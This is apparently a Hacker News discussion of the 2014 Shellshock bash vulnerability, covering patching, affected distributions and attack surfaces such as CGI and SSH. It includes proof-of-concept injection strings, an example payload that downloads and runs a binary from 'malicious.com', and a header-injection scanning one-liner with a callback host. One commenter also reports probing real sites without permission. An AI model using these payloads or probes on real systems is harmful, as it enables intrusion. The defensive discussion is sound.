cd bash-4.3

#apply all patches

for i in $(seq -f "%03g" 0 26);do patch -p0 < ../bash43-$i; done

#build and install

sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install

Once patched for CVE-2014-7169 the previous PoC should not return the date anymore:

bash: var: line 1: syntax error near unexpected token `='

bash: var: line 1: `'

bash: error importing function definition for `var'


cat: echo: No such file or directory

And thanks to all previous contributors!

This sequence failed for me because my Ubuntu 8.04 didn't have patch installed.

I found a source copy at https://launchpad.net/ubuntu/+source/patch/2.5.9-4 and built/installed that first. The resulting fix appears to work (after copying resulting bash to /bin as noted elsewhere).

I had the same problem. I needed to install patch, make and gcc. So I downloaded the iso from http://old-releases.ubuntu.com/releases/hardy/ and then edited /etc/apt/sources.list so my server would look on the cd for the packages. I could then use 'apt-get install' to install the required programs. I also found that the 'do' command was throwing up an error. Rather than work out why I just manually downloaded the 26 patches and then manually applied them as well. Yeah ok I'm a noob but it worked.

I am running Ubuntu 10.10 but patch is not installed. Can someone explain the commands needed to download, build, and install patch as mentioned above. Thanks for any help.

I found out how to install the patch package here:


This won't work; you need

sudo make install

Given the circumstances, a lot of people without much software experience will be reading this message and simply copying and pasting; it's worth getting it right.

On Ubuntu, you'll probably want to ./configure --prefix=/usr/bin . If you install in /usr/local/bin (the default), bash will effectively no longer be updated by apt-get.

That should probably have been ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc

Once upon a time, distributions documented their build configurations. Or maybe it's that I used to only use FreeBSD.

That script assumes that it is executed as root. There's indeed a possible problem with /usr/local/bin/bash vs. /bin/bash with Ubuntu update from 8.04 to 10.04 (since Ubuntu 8.04 itself is no longer updateable), thus I asked that question in the end of my post. To mitigate it, one can just add:

  mv /usr/local/bin/bash /bin
as the last line.

I tried this and realized, it installs the binary under /usr/local/bin. you'll need to make a symlink or preferably follow ricilake's advice. if you forget to do this and logout, you may never log back in. Btw, the path to the bash in ubuntu is /bin/bash not /usr/bin/bash

I just wanted to say, "Thanks!"

I successfully patched my 8.04 server and passed the test.

I used sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install after retrieving and patching the bash build files.

Why is my bash version still 4.2.45(1) after this?

    # bash --version
    bash --version
    GNU bash, version 4.2.45(1)-release (x86_64-pc-linux-gnu)
Though it seems the vulnerability got fixed.

Hi, I have tried to follow the instruction given by rtmdivine to patch for CVE-2014-6271 but at the end of the process I still get the date. Any suggestions? Thanks

In Debian Lenny you should also do at the end sudo rm /bin/bash && sudo ln -s /usr/local/bin/bash /bin/bash

need to wget all the patches including #26 to fix the 2nd bug reported. instead why not just wget the whole dir of patches..

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \\.sig index.html cd bash-4.3; for i in ../bash43-*; do patch -p0 < $i; done


wtf. this damn form ate my 's and stuff.

try again:

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \.sig index.html\*

should be no \'s (or \\s) before the *'s above.

I give up this thing is eating asterisks, cant type em

Does this fix CVE-2014-7169 as well, or just CVE-2014-6271?

It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

I am sure tons of people reading already know this, but I have a habit of saying this everywhere I see system() mentioned anywhere on the internet, just in case somebody reading is tempted to use it: system() is evil, please for the love of god never use it.

If you need to invoke another program use execve() and friends. The versions that end in -p will even check PATH for you. You don't need a shell to evaluate your arguments. Cut out the middle man and pass the arguments directly. It will save you a lot of stupid bugs.

There's nothing wrong with using system anywhere you would happily cover your eyes and paste the string content into a shell. That shouldn't be many places, if anywhere, in production software. It's fine for simple things that would've been shell scripts anyway but for the need to XYZ.

The API for system() is not great, but the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting. As long as you're not passing arguments from outside sources to the command, using system() should be OK.

> the execve family of functions are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.

Maybe not in C, but they are a drop-in replacement in just about every scripting language. Perl, Ruby, Python, all have nice high level calls that mostly mimic system() but use execve underneath—You simply pass system() multiple arguments instead of a single string. `system("")` in your production web app server code is almost certainly incorrect.

Sadly I think PHP still doesn't have this.

> As long as you're not passing arguments from outside sources to the command, using system() should be OK.

Very true, but think about whether you really need a shell to launch your command (are you using any shell features?). If not, why not just launch the command directly?

And in some cases invoking the shell and letting it do its thing is expected, intended and desirable.

Would you execute random Perl or Python code from the internet? No, you wouldn't, even if you tried to sanitize it a thousand ways from Sunday. So why would you do so for the shell?

Defense must use different strategies than offense. An engineer's goal should be to reduce the problem space to something as small as possible, so he has a better chance at implementing a correct solution. Allowing the shell to be invoked is a good way to explode your exploitable surface area.

Anybody who coded in the 1990s knows to stay away from the shell like the plague, even though the syntax parsing and evaluation components in modern shells have improved considerably. Sadly this particular bug harks back to the bad days, when it was more difficult to tell how certain constructs would be evaluated.

It's not that you can't theoretically do it securely, it's just that you're gratuitously playing with fire--fire that has burned countless engineers in the past. The cost+benefit is so indisputably skewed toward little cost and huge risk that it's unprofessional to suggest otherwise.

The shell shouldn't come anywhere near network-facing software, period.

> are not drop-in replacements since they don't take care of forking, changing the signals, and waiting.

I never claimed it as a drop-in replacement. I think you know the solution to these problems. (I guess maybe someone who naively uses system() might not, so perhaps I need to work on a better spiel.)

> As long as you're not passing arguments from outside sources to the command, using system() should be OK.

Personally I've seen too many bad uses of system() to make that a thing. Maybe they'll not realize it's subject to PATH and that PATH can be untrusted. Maybe they'll not realize they sometimes have asterisks and spaces in a filename. And so forth...

Do you have a source for that? Some articles [0] claim "This affects Debian as well as other Linux distributions."

[0] http://www.csoonline.com/article/2687265/application-securit...

Debian7 doesn't look to be vulnerable by default (if the code snippet can be trusted to work):

    [arch/testbed ~] uname -a
    Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
    [arch/testbed ~]  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test

I have a Debian Squeeze system. Just ran apt-get upgrade and bash wasn't upgraded at all. Just other things like CUPS, exim4, pgsql, ...

Squeeze doesn't have regular security support anymore. A subset of packages on i386 and amd64 are receiving long term security support, but you need to enable the Squeeze LTS repo:


It has not reached the lts mirrors yet, but you can get it from http://incoming.debian.org/debian-buildd/pool/main/b/bash/

As of 7:24 PM GMT the above link has the amd64 .deb for sid.

Still waiting on the i386 .deb for sid.

Your link and this link (https://security-tracker.debian.org/tracker/CVE-2014-6271) useful when considered together.

The i386 .deb is available!

Aaaand now I'm done checking back on this thread. Have fun, folks! :)

Thanks. dpkg --install'ed the amd64 .deb package, and the vulnerability test passes now.

Make sure security.debian.org is in your apt sources list?

Thanks for the hint folks. My eyes glazed over when OSS people started using packages some 20 odd years ago.

My brain refuses to understand anything more than the beautiful simplicity of a tarball extracted from the / directory. :)


Yes, the printing of “vulnerable” in the 4th line of your code snippet.

You appear to already have the updated package installed.

Last dist-upgrade was about a week ago, all indications point towards the bash released back in Jan 2013. It's fixed in 4.2+dfsg-0.1+deb7u1 and I'm running 4.2+dfsg-0.1

Well, that's very odd because that command reports vulnerable on an unpatched Debian system, but fails with exactly that error message on a patched system.

You're right and my comment was unclear. I'm just saying that the impact on Debian will be less than on distros using /bin/bash for /bin/sh. Of course, even a lessened impact can still be really bad!

Likely meaning that the Debian packages for Bash include the vulnerability

Isn't /bin/sh vulnerable to the same thing? At least it seems for me:

    sh-3.2$ env x='() { :;}; echo vulnerable' /bin/sh -c "echo this is a test"
    this is a test

/bin/sh depends on the system. It might be busybox or a minimal shell (this is common on embedded devices). On some systems like OSX and I think CentOS /bin/sh is just bash. You can check with `/bin/sh --version`.

Ah, thanks. Yes, tested it exactly on OSX and CentOS.

Major impact of this is elevating privileges, both Debian and Ubuntu will be impacted just like any other system.

I don't think anybody is worried about software on the system that is using /bin/bash .vs /bin/sh.

Where is the privilege escalation? I get the same results from running id through tripping the bug as I do from running id directly.

Edited to add: Also no differences in capabilities when I cat /proc/self/status

None of which is to say there is clearly no such vulnerability - I'd just like to understand it if there is.

Basically, anywhere this vulnerability exists, there is the option to run arbitrary code. That is for example:

   curl malicious.com/local_privilege_escalation_binary -o /tmp/iwin; iwin
could be the payload. This will download then run a secondary attack binary. Then the attacker wins.

That's true of any code execution vulnerability, though - it seems odd to call out the privilege elevation specifically. If that's all the GP meant, then sure, I fully grok.

I think it comes down to a jargon vs technical language thing. In formal settings arbitrary code execution is a different thing from privilege escalation. In casual jargony talk though, security guys tend to equate code execution with privilege escalation with box ownage.

Basically it goes "why would anyone not follow the execution -> escalation -> own path?" It's such an automatic assumption, combined with the basic premise of "there's no such thing as a secure computer", that the exact details are a hand-wave. This comes from the repeated demonstration that it's almost always true.

None of this seems crazy unlikely, but I'd still like to hear a confirmation that that's what was meant. Especially since korzun was talking specifically about Debian and Ubuntu where bash is only used as a login shell and so presumably those with access could already just run the app.

There are unfortunately lots of bad scripts in the world that start with:

So for example, with a foo.sh script of:

   echo "loser!"
Then for example:

   vagrant@ubuntu-14:~/bin$ X='() { :; }; echo foo' python
   Python 2.7.6 (default, Mar 22 2014, 22:59:56) 
   [GCC 4.8.2] on linux2
   Type "help", "copyright", "credits" or "license" for more information.
   >>> import os
   >>> os.system("./foo.sh")
   >>> import subprocess
   >>> subprocess.Popen("./foo.sh")
   <subprocess.Popen object at 0x7f04a115f350>
   >>> foo
It should be noted that if the shebang is #!/bin/sh this doesn't work when sh == dash, but given that this wiki page exists on ubuntu:


That recommends changing broken scripts to #!/bin/bash or changing to sh == bash as solutions. I would guess that there are going to be plenty of easily vulnerable debian/ubuntu systems.

More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating", the are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.

'More importantly though, it literally does not matter if this bug is "directly privilege escalating" or "1 step removed privilege escalating", the are fundamentally the same thing. It doesn't matter in any case where a script is executed with bash instead of dash.'

It doesn't matter for security. It matters a lot for my understanding of what's going on.

Most code executions vulnerabilities aren't remotely accessible, which this is, which makes priv-escalation particularly nasty. (eg: incorrectly assuming that since www-data user doesn't have access to anything sensitive, this bug isn't a big deal)

Is it remotely accessible on systems where sh is dash, though? That's specifically what was under discussion.

Yes, potentially - if at any point during the execution of a program (or its descendents) a bash script gets called with an untrusted environment variable value from a remote source. The difference between a system with bash as /bin/sh and a system with dash as /bin/sh is that the bash system is implicitly executing bash all the time, whereas the dash system requires an explicitly-bash script to be executed. So the dash system has many fewer windows of opportunity for an exploit, but they could still be there.

Well, sure. It seems a slightly odd way to phrase it if that's the entirety of what korzun meant, though. Is there somewhere that happens in a typical out-of-the-box Debian or Ubuntu box?

Privilege escalation is not static.

I know systems where bash has been patched to allow execution by certain users, etc.

With this, you can inject commands before such check takes place.


Hm, so only if bash is chmod or granted capabilities, absent exploiting some other vulnerability? I'd read you as saying more - no worries.

Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.

Basically this is a misfeature that must be rooted out, pardon the pun.

Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat e

From http://seclists.org/oss-sec/2014/q3/672

I replaced "sh" with "bash" in the above, and on my patched system it creates a file called "echo" with the date in it. Can anyone explain how this works? Is it an exploit?

Edit: From my experiments, the name in (a) doesn't matter, and "echo" and "date" can be changed. The thing in echo's position is where the output goes (and can be an absolute path!), and "date" is a command that is run. Still no idea how it works, as I'm not very familiar with shell syntax and Googling symbols like "=>" is mostly useless. It may even be meaningless and is just garbage to get bash into a state that causes this to happen?

Edit 2: http://seclists.org/oss-sec/2014/q3/679 has a small example. "Tavis and I spent a fair amount of time trying to figure out if this poses a more immediate risk, but so far, no dice. It strongly suggests that the parser is fragile and that there may be unexpected side effects, though"

I can't comprehend how this got buried so fast in the mist of "patch, patch, patch".

So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

It allows arbitrary code execution if an attacker can modify environment variables through other software.

Most webservers put certain HTTP headers in environment variables. I can certainly see the how this could be exploited.

> Most webservers put certain HTTP headers in environment variables.

I legitimately don't understand why they might do such a thing. Can you explain?

They need to pass data into a CGI script somehow.

But a shell will rarely be involved in executing a CGI, unless that CGI itself executes one. And who still uses CGI scripts?

Not to say nobody will be bitten by that, but I don't think that's going to be all that widespread.

Have you ever looked at the backend web interface of some of the most popular residential wifi routers? It's shell script. Why? It's a cheap and accessible interpreted language; no need to clutter up your tiny embedded OS with the huge requirements of php, perl, etc when you have all the tools you need in busybox.

CGI apps execute shell scripts all the time. Even if an app executes an app executes an app executes an app, if that app four layers down runs a shell script, the environment is still passed down. Turtles, dude.

Fortunately they are unlikely to install bash at all on a router.

Routers definitely have shells, it's just a matter of whether it's bash or something else that might also be vulnerable.

Bash is big and bloated, and you already have the busybox sh probably. However apparently some do have bash....

Many people don't realize they use CGI scripts, but a lot of people are going to discover they do today.

It could be a simple one-line script that wraps the real command, setting memory limits and the like first. (I used a similar trick to prevent Skype using up all my memory in the past.)

agreed, also Browser User Agent, referrer are all passed by the client and sent to Apache, which pushes them into environment variables.


Another attack surface is OpenSSH through the use of AcceptEnv variables. As well through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

On most systems I've found this works: LC_TIME='() { :;}; echo vulnerable' ssh <hostname>

Not sure of the impact of this, as the user would need to have a remote permissions anyway for the SSH login to occur. But if there was some form of restricted shell that then spawned bash it might potentially create an attack vector.

I was wondering about this too. My thinking was, if a user's laptop is compromised (and has the exploit in LC_TIME, TERM or similar), and the user then SSH in to a server with exploitable bash, the nefarious command will presumably be executed without the user knowing. But of course, if the laptop is compromised that badly, it could probably wreak havoc to the server anyway.

As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.

This vulnerability is the kind of reason I would have a stripped-down OpenSSH for public users, if I were them. Hard-code to do what they need, don't use configuration files, remove any features not needed. For example, to print the "You've successfully authenticated, but GitHub does not provide shell access." a user gets trying to ssh to github.com, don't invoke anything, print it directly from the SSH server.

Much easier to implement a custom captive shell (default login shell for user) then to mess with the crypto system.

Maybe. Actually, it looks like Github is using libssh, which is along the lines of what I was thinking, without having to mess with crypto too much, as you say.

This is what Atlassian Stash does.

Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

Still waiting for a fix on Beanstalk. Neither "yum clean all" followed by "yum update bash" nor "yum --releasever=2014.09 update bash" currently work.

EDIT: relevant AWS threads



Should be fixed now:

To manually update EC2 instances managed by Elastic Beanstalk, you can run the following command:

For Amazon Linux 2013.09 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2013.09/updates/556c...

For Amazon Linux 2014.03 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2014.03/updates/e10f...

If yum still doesn't find it, you may be on an older release. Try "yum --releasever=2014.09 update bash"

I'm considering pulling an rpm from elsewhere until they have this in place.

It's updated now

A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell will lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.

Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.

How are you testing it? If you're just pasting one of the proof-of-concept lines into zsh, such as this one:

    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
...then you're really just executing bash. Replace "bash" in the line above with "zsh" and the "vulnerable" line is not printed.

No, it's not printed in your trivial example, but if you replace the simple "echo" command with any bash script, or any executable that calls a bash script, or any executable that invokes another program that calls a bash script, or ... then you're screwed.

Even with the "zsh", this should print "vulnerable":

  env x='() { :;}; echo vulnerable' zsh -c "bash -c true"
You don't have to use bash explicitly. It might be called by some application or library. For example, if your default shell is a bash, this will work too:

  env x='() { :;}; echo vulnerable' zsh -c "python -c 'import os; os.system(\"true\")'"

Right, the point being that bash is vulnerable, not zsh (as was suggested by the post I was replying to). I'm not claiming that using zsh as your interactive shell somehow makes you immune.

I see this in zsh 5.0.0 on Ubuntu, and on OSX as well! zsh 5.0.2 (x86_64-apple-darwin13.0)

I'm not seeing this on zsh 4.3.17. Exactly what did you run to see this?

They probably ran

  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
but failed to spot that the second command invokes bash not zsh.

My tests suggest that neither zsh 4.3.17 or 5.0.6 (the versions that ship with Debian stable & testing respectively) are vulnerable to this exploit - if you replace bash with zsh in the test oneliner then the code after the end of the function definition in the environment variable is not executed.

That's it, I am an idiot today. (and more days probably)

According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).

Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...

However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.

I'm hoping we'll see a patch soon that altogether removes this misfeature.

EDIT: Apparently that's out of the question, but there's talk about using a BASH_FUNCDEFS variable to specify which variables are function definitions instead: http://www.openwall.com/lists/oss-security/2014/09/24/20

CGI has always been an accident waiting to happen, but hardly anybody uses it anymore anyway, and even more rarely in a manner that invokes bash, of all things.

I fail to see how "HTTP requests" generically are a vector, and its "Here is a sample" statement is not a link and is followed by... nothing.

This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

This article tells me nothing useful other than "don't allow untrusted data into your environment", which we've all known for 20 years.

Yes, we've all known that. But we're slowly discovering all different ways the untrusted data can get there.

FastCGI accepts name/value pairs from the server and most default language bindings against it will turn them into environment variables for the benefit of code that expects to be able to reference them. This can get tricky if you do anything that spawns a process with your code later.

Almost all vendor-supplied web interfaces that don't come bundled with a web server are CGI so you can just run it from whatever web server you have. Even some very popular 'appliances' out there that have their own web server run CGI.

People still shell out to do stuff from scripts from all sorts of languages. Unless these sanitize the environment they would be vulnerable.

Unless you're using CGI, your system environment will not be contaminated. CGI is vulnerable because it relies on passing untrusted data in environment variables. No other gateway interface I'm familiar with does.

Are you certain that no method of invoking a dynamic script sets environment variables to values controlled by requests? If so, it sounds like even an innocent call to system("lame a.wav b.mp3") could lead to code execution.

Edit: also, you may be surprised to find that some "libraries" are actually wrappers around external binaries (e.g. libgpgme). If any of them used a system() or exec() call that preserves environment, and the binary or the library ever invokes bash (e.g. via system()), then trouble will ensue.

Are you certain God doesn't exist?

This is far from the first environment variable attack to impact CGI scripts, and CGI's successors have avoided passing data in environment variables.

It's possible some moron decided to create their own CGI replacement using environment variables, but it's not going to be in widespread use.

How does nginx pass data to passenger?

Edit: also note that CUPS is vulnerable according to https://access.redhat.com/articles/1200223

Also dhclient (!)

If you're using the nginx module, it gets the data from an instance of ngx_http_request_t. From there it gets passed around over sockets. Environment variables are not involved.

Using environment variables for request data would be quite insane when one of your marketing strategies is "fast" -- you'd either have to fork-per-connection just like CGI, or pre-fork processes that take input over a socket, deliberately deserialize it into the environment(!), and use getenv.

However overhyped Passenger might be, I don't know why you'd think the Phusion guys are that crazy.

Discovering that CUPS and dhclient may be vulnerable doesn't change anything. I'm talking about HTTP as an attack vector.

> hardly anybody uses it anymore anyway

Lots of PHP setups do.

Lots? Really?

PHP was one of the first to have a dedicated apache module. Perl is much more likely to be CGI.

I seem to recall cPanel defaulting to suPHP (which uses CGI).

Yeah this is true - a lot of hosting providers run PHP as a CGI as it allows them to run the PHP process under the user account (although it is very slow, and RUID2 is a better solution).

If you're not running mod_cgi can this affect the system in any way?


Yes, lots. nginx + php is very popular.

Is fastCGI the same thing as CGI, for this case, though?

They would be too slow to be useful at any kind of real load. Are you sure you're not thinking of FastCGI? That doesn't pass data through the environment, it goes over a socket.

Yeah - it is really slow, but a surprisingly large number of hosting providers run it that way under cPanel.

Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.

They will be patching shortly [1]

[1] - https://twitter.com/jacobian/status/514865870649061376

Yep, they did. :)

Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?

Its been a bad time for FOSS/Linux systems. Heartbleed, the occasional priv escalation, apt-get, bash, etc. Or whatever the hell happened at TrueCrypt. Or the recent AOSP browser bug in Android that probably won't be patched by any OEM/Carrier. These are all pretty serious issues. Not to mention the endless wave of malware targeting Windows systems, especially the evil cryptolocker ransomware.

I really do think heartbleed was a wake-up call for some people and a lot of extra auditing is being done, perhaps with some healthy paranoia fueled by the recent NSA allegations. Software, in general, imo, is pretty insecure. The exploits, bugs, etc are out there and if you'll find them if you look hard enough. Considering software is always being updated, that also means news bugs and security issues.

As a sysadmin, I've just seen too often how the sausage is made. I have zero illusions about security. There are just too many avenues to compromise, be it via software or via plain-jane social engineering. I think one day in the future we (or our children) are going to look back at the age of viruses and buffer overflows and wonder how the hell we managed to get by, the same way I look at cars from the 50s-60s that suffered from things like vapor lock, were incredibly unsafe, and other issues that really don't exist today.

Are you referring to this apt-get vulnerability or another one: https://lists.debian.org/debian-security-announce/2014/msg00... ?


Its not like each year is an increase.. but it seems this year has had more major giant remote ones then in the past

you're just paying attention. There have been some interesting ones the last year or two but this is really a trickle compared to early through mid 2000s

I still remember Redhat 6.2. Most remote exploits in a distribution ever.

people started to pay attention. theres a bunch of new vulns being patched daily. if you follow cve's or oss list you can see that.

what's "new" (been done for a few years now) is that there's more marketing drive behind them. Fancy commercial names and websites dedicated and issues are often exaggerated.

Actually super critical vulns are still rare (like HB, codered, etc.)

I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

Even a harmless code exploit, when run on a computer system you do not have normal permission to use, is a felony in the USA.

Some more information was just posted to oss-sec:


With this bug, bash access to CiscoCallmanager is possible... Tested and working....

VoIP software is hilariously insecure in general. This little bug is going to make some people a ton of money. Or even just cost some people a lot.

Same for Cisco NX-OS...

Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

Don't tell anyone.

I'm a bit confused about how to properly patch my mac.

Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

You're correct – you'd need to overwrite /bin/bash (think long and hard about this) to update it before Apple ships an update.

The good news is that as long as you're not running a local server, the vulnerability is pretty limited particularly since even if you did have SSH enabled the exploit would require valid authentication first.

There's some potentially funky stuff there like CUPS, which runs a local daemon that serves binary CGIs (though I think it's bound to localhost by default).


Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.

> Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.

I would go further and suggest that now is an excellent time to ask which of those services you really need to have at all. The default of blocking incoming connections is right for most people, even developers.

At least on linux that's not true as NetworkManager + dhclient is affected through malicious dhcp packets. There could be attack vectors almost everywhere.

Oh, certainly. I was only talking about OS X, which didn't build the DHCP client around a collection of shell scripts for portability.

On OS X, you could see every time a process is invoked like this:

sudo execsnoop -c bash

On Linux, that requires work which fortunately Brendan Gregg already did:


You could move /bin/bash to another location, and then create a symlink from the Homebrew version to /bin/bash.

Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse

Just did something similar with Ansible, the simple task "apt update_cache=yes pkg=bash state=latest" will do the trick. At least it did for me.

The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929

My findings so far: setting User-Agent to that new string and executing a .cgi script complains about: syntax error near unexpected token `newline' in `#!/bin/bash'. (My speculation is that we are in some kind of parsing context where no newlines are expected; none are given on the example bash -c ... line, but when you actually run a script there will be a newline).

I tried to change this to a Python script and instead use os.popen. Well, Ubuntu /bin/sh is "dash" so that's not affected.

I tried to explicitly call bash via os.popen("bash -c 'some command'") -- no go either, as that bash command started by parsing some /etc/bash.bashrc file and complaining about newlines there.

Finally I used os.popen("bash --norc -c '/tmp/file date'") -- and that ended up running "date > /tmp/file" from the CGI script.

I tried replacing /bin/sh by "bash" instead of dash. That now made the CGI script choke on reading some other RC files due to the unexpected newlines in the context bash starts with.

So the question from me still seems to be: what is the weird context setup by that environment setup, and what else can do you with it than to redirect $1 to $0 ?

That works for me too. I was first unsure but breaking it up into an export Z=.... and then running bash -c 'echo date' on a separate line seems to execute essentially date > echo.

Can anyone explain what's going on there? Seems like defining a function within a nameless function; how does it end up with this redirect? I'm not sure what the exploitabiliy of this is; is it just essentially $1 > $0 ?

The redirect at the end of the env var seems to be "remembered" even though the syntax error aborts the function definition, then the first arg is taken as the path to redirect to, and the following args as the command to execute. (I haven't dug into the actual parser, this is just my intuitive understanding.) It does seem to be about like $1 > $0, so not generally exploitable.

Here's an example using it to read files instead of write: https://news.ycombinator.com/item?id=8365205 But still, not as universal of an exploit as the original.

Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something
  else outside your program--at least, not by accident. All command line
  arguments, environment variables, locale information (see perllocale),
  results of certain system calls (readdir(), readlink(), the variable
  of shmread(), the messages returned by msgrcv(), the password,
  gcos and shell fields returned by the getpwxxx() calls), and all
  file input are marked as "tainted".

  Tainted data may not be used directly or indirectly in any command
  that invokes a sub-shell, nor in any command that modifies files,
  directories, or processes, with the following exceptions:

Not true if the perl script calls out to bash (i.e. via system), as it doesn't sanitize the environment:

    $ env x='() { :;}; echo vulnerable' perl -T -e "\$ENV{PATH} = '/bin'; system('ls | cat');"  
    sh: warning: x: ignoring function definition attempt
    sh: error importing function definition for `x'

My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  this is a test

Doesn't OSX ship the 8-year-old bash 3.2 (2006) i.e. the last version available as GPLv2? (Apple hates GPLv3)

For me in 10.9.5:

  $ bash --version
  GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
  Copyright (C) 2007 Free Software Foundation, Inc.

It does. I installed an up-to-date version with homebrew a few months ago, and it was vulnerable as well. After a `brew update && brew upgrade bash` I had the fix installed, though :)

If i remember correctly Apples stopped updating bash in OSX a long time ago I wonder if this will get fixed.

My OSX was vulnerable too, but I use Homebrew, and the latest version of bash available via brew update && brew upgrade is patched against this.

If you haven't already been using Homebrew though, you will likely need to move /usr/local/bin infront of /usr/bin in your path, otherwise the old bash would still be used.

This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com' 
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

Would disabling CGI e.g. adding Option -ExecCIG to httpd.conf for Apache prevent exploitation via the web-server?

import os os.putenv("ANYTHING", "() { :;}; echo bu") os.system("bash")

If this works (and it does) that means it's enough for a CGI script to invoke bash. It doesn't even have to be written in bash.

Maybe the bash is invoked on some other request path, not just / which you are scanning.

I would go with /login and such, or write a crawler to parse out where the login/logout URLs are and try those.

It seems like the current patch might not be a complete fix:


I think the default in bash should be to never execute the contents of environment variables (like the restricted shell mode allows). Does anyone know why it allows you to pass in shell functions this way? Does anything use it?

Am I wrong in thinking that seems a bit worse than Heartbleed?

The exploit is worse.

But I'm not sure how a scanner bot would find network accessible bashes to exploit. Seems like basically you need a cgi-bin with bash, and I don't think there's any way to predict a URL that is going to have such a thing.

Now, if there is some popular app that ends up vulnerable (perhaps because it shells out to bash), then that's definitely going to be huge.

But as it is... I'm not sure?

